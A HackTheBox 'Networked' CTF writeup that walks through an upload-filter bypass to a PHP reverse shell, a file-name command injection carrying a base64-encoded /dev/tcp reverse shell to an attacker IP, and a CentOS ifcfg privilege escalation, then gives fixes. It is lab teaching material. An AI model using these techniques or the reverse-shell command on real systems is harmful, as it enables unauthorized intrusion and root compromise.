---
title: "Writeup - Networked (HTB)"
date: 2022-05-27
slug: "writeup-networked-htb"
type: "writeup-ctf"
---

This is a writeup for the [Networked](https://app.hackthebox.com/machines/Networked) machine from the HackTheBox site.

## Enumeration

First, let's start with a scan of our target with the following command:

```bash
nmap -sV -T4 -Pn 10.10.11.146
```

Two TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp: SSH (OpenSSH 7.4)
- 80/tcp: HTTP web server (Apache 2.4.6)

![](img/image-2.webp)

## Exploit

First, I enumerate the pages of the website.

![](img/image-3.webp)

Several pages are interesting, especially `backup`, which contains an archive.

![](img/image-4.webp)

I download the archive, extract it and find the following files inside:

![](img/image-5.webp)

The files correspond to pages of the site:

![](img/image-6.webp)
![](img/image-7.webp)

So we can upload images on the `upload.php` page and then view them on the `photos.php` page. Analysing the source code of `upload.php`, I find that the uploaded files are checked:

```php
[...]
list ($foo,$ext) = getnameUpload($myFile["name"]);
$validext = array('.jpg', '.png', '.gif', '.jpeg');
$valid = false;
foreach ($validext as $vext) {
  // substr_compare with a negative offset compares only the tail of the name:
  // the check passes as soon as the name *ends* with an allowed extension.
  if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
    $valid = true;
  }
}
[...]
```

This loop only verifies that the file name ends with one of the allowed extensions. But I can't simply send a PHP reverse shell renamed to `.png`, because the site also checks the file signature to verify its type. The signature of a file is a set of magic bytes at the beginning of the file. In the following list I find the signature of GIF files (`GIF89a`): [file signatures](https://en.wikipedia.org/wiki/List_of_file_signatures). Before adding the signature, my file is identified as plain Unicode text:

![](img/image-8.webp)

After adding the GIF signature, the file is now identified as GIF image data.
![](img/image-9.webp)

In addition to the signature, I have to change the extension so that the file passes the check but is still executed as PHP by the server. A double extension does both: the name ends with `.gif`, so the extension check passes, and the `.php` component is enough for Apache to hand the file to the PHP handler:

```bash
mv reverse.jpg reverse.php.gif
```

I can now upload it and open it to execute the code and get the reverse shell.

![](img/image-10.webp)

I now have a reverse shell as `apache`, but that user can't read the first flag. In the home folder of the user `guly`, I notice two interesting files:

![](img/image-11.webp)

The first one is a crontab entry that runs the `check_attack.php` script every 3 minutes:

```bash
*/3 * * * * php /home/guly/check_attack.php
```

The second one is the script itself, which deletes suspicious files from `/var/www/html/uploads`:

```php
[...]
// loop header truncated in the original; the files of the uploads directory are iterated here
foreach ($files as $key => $value) {
  $msg='';
  if ($value == 'index.html') {
    continue;
  }
  #echo "-------------\n";
  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);
  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
    exec("rm -f $logpath");
    // the file name is interpolated unquoted into a shell command
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}
?>
```

Interestingly, the script passes the file name straight into an `rm` command run through `exec()`, without any sanitisation. Every file in the uploads directory whose name fails `check_ip` is treated as an attack and removed with `/bin/rm -f $path$value`, so a file name containing shell metacharacters becomes a command injection, executed by the cron job as `guly`. I can therefore create a file whose name is composed of a harmless prefix, then `;` to terminate the `rm` command, then a reverse shell encoded in base64: the encoding is needed because `/` is the path separator and cannot appear in a file name, while the decoded command needs `/dev/tcp/...`. To create the file I use the following command:

```bash
touch /var/www/html/uploads/test';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzUgMD4mMQo= | base64 -d | bash'
```

The base64 string decodes to `bash -i >& /dev/tcp/10.10.14.3/1235 0>&1`. I wait for the next run of the cron job (at most three minutes) and get a reverse shell as `guly`, which lets me read the first flag.
![](img/image-12.webp)

## Privilege escalation

First I check the sudo permissions of my user:

![](img/image-13.webp)

I am allowed to run the `changename.sh` script as root. Reading the script, I see that it writes a network interface configuration file (`ifcfg-guly`) and asks the user for the values of four fields:

```bash
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
```

The input is validated with a regular expression, but the allowed character class includes a space. After some research on the distribution used by the machine (CentOS), I find the following flaw: [CentOS Network Interface Exploit](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f). On CentOS the network scripts source the `ifcfg-*` files as shell, so a value containing a space (for example `guly /bin/bash`) is written as `NAME=guly /bin/bash`, and everything after the space is executed as a command, as root. I run the script and enter such a name for the interface:

![](img/image-14.webp)

I now have a root shell and can read the last flag.

## Recommendations

To fix this host, I think the following actions are necessary:

- Do not leave the source code of the website (the `backup` archive) accessible to everyone
- Add stronger protection on the upload: validate the whole file name rather than only its last extension, so that code cannot be uploaded
- Do not use user-controlled variables in shell commands without sanitizing them
- Do not accept whitespace in values that are written to files later sourced by the shell
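As an added example for the privilege escalation step (not code from the original writeup or the box), the script below reproduces the `changename.sh` regular expression, renders the `ifcfg-guly` file the script would write, and sources that file with `/bin/sh` the way the network scripts do. A harmless `echo` stands in for the shell an attacker would start; the hardened regex that rejects whitespace is my own suggestion:

```python
"""Added example, not from the original writeup: why the changename.sh regex
is insufficient. A value with a space passes the filter, and when the
resulting ifcfg file is sourced by a POSIX shell the word after the space
runs as a command.

Assumptions: /bin/sh is available; the file is sourced with `.`, as the
CentOS network scripts do; the payload is a harmless `echo`.
"""
import os
import re
import subprocess
import tempfile

# Character class from changename.sh: letters, digits, '_', space, '/', '-'.
# Inside a bracket expression the backslash is literal, so '\' is allowed too.
ORIGINAL_REGEX = re.compile(r'^[a-zA-Z0-9_\\ /-]+$')
# Hardened version (my suggestion): no whitespace, no '/' and no backslash.
HARDENED_REGEX = re.compile(r'^[a-zA-Z0-9_-]+$')


def accepted(value: str, regex=ORIGINAL_REGEX) -> bool:
    """True if the interactive loop in changename.sh would accept the value."""
    return regex.match(value) is not None


def render_ifcfg(name: str, proxy_method: str = 'none',
                 browser_only: str = 'no', bootproto: str = 'dhcp') -> str:
    """Reproduce what changename.sh writes: the fixed heredoc header, then one
    VAR=value line per prompt, appended unquoted by `echo $var=$x`."""
    lines = [
        'DEVICE=guly0', 'ONBOOT=no', 'NM_CONTROLLED=no',
        f'NAME={name}', f'PROXY_METHOD={proxy_method}',
        f'BROWSER_ONLY={browser_only}', f'BOOTPROTO={bootproto}',
    ]
    return '\n'.join(lines) + '\n'


def source_with_sh(content: str) -> str:
    """Write the content to a temp ifcfg file, source it with /bin/sh and
    return whatever the sourced file printed. 'NAME=guly echo X' is parsed
    as an assignment prefix followed by the command `echo X`."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, 'ifcfg-guly')
        with open(path, 'w') as f:
            f.write(content)
        res = subprocess.run(['sh', '-c', '. "$1"', 'sh', path],
                             capture_output=True, text=True, check=False)
        return res.stdout.strip()


if __name__ == '__main__':
    payload = 'guly echo INJECTED'               # constructed benign input
    print('accepted by original regex:', accepted(payload))
    print('accepted by hardened regex:', accepted(payload, HARDENED_REGEX))
    print('output when sourced:', source_with_sh(render_ifcfg(payload)))
```

When the real script runs under `sudo`, the sourcing happens as root, which is why a single space in the interface name is enough for a root shell.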